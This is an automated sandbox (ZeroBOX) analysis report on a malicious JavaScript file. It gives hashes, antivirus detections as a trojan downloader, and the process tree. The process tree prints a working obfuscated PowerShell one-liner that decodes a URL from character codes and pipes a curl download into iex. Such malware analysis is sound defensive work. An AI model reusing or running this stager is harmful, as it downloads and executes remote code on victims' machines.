Summary | ZeroBOX

CNOZ1237_3680420.js

Category FILE
Machine s1_win7_x6401
Started Nov. 1, 2023, 9:42 a.m.
Completed Nov. 1, 2023, 9:44 a.m.
Size 620.9KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR, LF line terminators
MD5 8bc1516039ff6f4e48087ae01613c98a
SHA256 8b9a3a70b676420ce03d9e6fb4c61d8d5e1eb7d342bc64064e9410efd9f802f5
CRC32 905C7555
ssdeep 3072:e8GOE2sZO+rPAeukQ9PiLdhp2t/D84ytZhkdbBQsl817hDVsl+13kyI2cH0u6/zR:6
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\CNOZ1237_3680420.js

    2552
  • conhost.exe conhost --headless powershell $qvmkxbdtleof=(4161,4146,4163,4167,4164,4168,4147,4158,4092,4162,4157,4158,4093,4095,4092,4158,4150,4158,4109,4150,4143,4161,4150,4107);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $qvmkxbdtleof){$awi=$rob9e;$ftjxwlmqpdak=$ftjxwlmqpdak+[char]($awi-4046);$vizit=$ftjxwlmqpdak; $lira=$vizit};$nboukqlcagti[2]=$lira;$jwfblk='rl';$five=1;new-alias zwert cu$jwfblk;.$([char](9992-9887)+'ex')(zwert -useb $lira)

    2676

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API GetComputerNameW
Arguments computer_name: TEST22-PC
Status 1
Return 1
Repeated 0
Symantec Scr.Malcode!gen105
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Time & API IWbemServices_ExecMethod
Arguments
inargs.CurrentDirectory: None
inargs.CommandLine: time
inargs.ProcessStartupInformation: None
outargs.ProcessId: None
outargs.ReturnValue: 9
flags: 0
method: Create
class: Win32_Process
Status 1
Return 0
Repeated 0